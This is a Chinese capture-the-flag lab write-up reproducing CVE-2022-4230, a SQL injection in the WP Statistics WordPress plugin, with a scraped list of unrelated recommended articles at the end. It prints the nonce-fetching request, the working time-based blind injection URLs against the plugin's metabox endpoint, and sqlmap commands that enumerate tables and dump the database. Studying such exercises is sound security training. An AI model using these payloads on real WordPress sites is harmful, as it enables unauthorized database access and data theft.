春秋云镜——SQL注入漏洞复现——CVE-2022-4230

春秋云镜------SQL注入漏洞复现

题干信息:
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
1.打开题目,发现是wordpress的框架,直接test/test进入后台

2.查看安装好的插件

3.根据题目给的提示WP Statistics的版本信息为13.2.8,继续找口子

4.照着版本测试
获取wpnonce
/wp-admin/admin-ajax.php?action=rest-nonce

5.获取到的值:d3e55c6649
/wp-json/wp-statistics/v2/metabox?_wpnonce=d3e55c6649&name=words&search_engine=aaa

6.时间盲注poc

/wp-json/wp-statistics/v2/metabox?_wpnonce=7fe145780f&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

7.中途时间到了,继续获取值
/wp-admin/admin-ajax.php?action=rest-nonce
6784193c7c

8.时间盲注
/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa

/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(10)))Mdgs)--%20HsBR

9.成功获取当前数据库
python sqlmap.py -r 1.txt --random-agent --batch --current-db

Payload

_wpnonce=6784193c7c&name=words&search_engine=aaa' AND (SELECT 2568 FROM (SELECT(SLEEP(5)))UGlY) AND 'gotj'='gotj

10.获取数据库表名
延时注入时间太长靶机又得重新启动
获取值

/wp-admin/admin-ajax.php?action=rest-nonce
baea1c41af

/wp-json/wp-statistics/v2/metabox?_wpnonce=baea1c41af&name=words&search_engine=aaa

C53cd095b3

/wp-json/wp-statistics/v2/metabox?_wpnonce=ceb22a74d5&name=words&search_engine=aaa

ceb22a74d5

11.总的有34张表
python sqlmap.py -r 1.txt --random-agent --batch -D wordpress --tables

12.因为时间原因看到flag这张表啦,直接冲
python sqlmap.py -r 1.txt --random-agent --batch -D wordpress -T flag --dump

13.提交成功

相关推荐
柏油30 分钟前
MySql InnoDB 事务实现之 undo log 日志
数据库·后端·mysql
星哥说事42 分钟前
使用开源免费雷池WAF防火墙,接入保护你的网站
web安全·开源
浩浩测试一下1 小时前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
DolphinScheduler社区1 小时前
白鲸开源WhaleStudio与崖山数据库管理系统YashanDB完成产品兼容互认证
数据库·开源·认证·崖山数据库·白鲸开源
阑梦清川1 小时前
AI超级智能体项目教程(二)---后端项目初始化(设计knif4j接口文档的使用)
java·前端·数据库
hotlinhao1 小时前
ThinkPHP6模型中多组条件逻辑或Or查询的使用
linux·服务器·数据库
蚁景网络安全1 小时前
从字节码开始到ASM的gadgetinspector源码解析
网络安全
jack xu11 小时前
高频面试题:如何保证数据库和es数据一致性
java·大数据·数据库·mysql·elasticsearch
Pocker_Spades_A1 小时前
金仓数据库征文-政务领域国产化数据库更替:金仓 KingbaseES 应用实践
数据库·政务·金仓数据库 2025 征文·数据库平替用金仓
XY.散人2 小时前
初识Redis · 哨兵机制
数据库·redis·缓存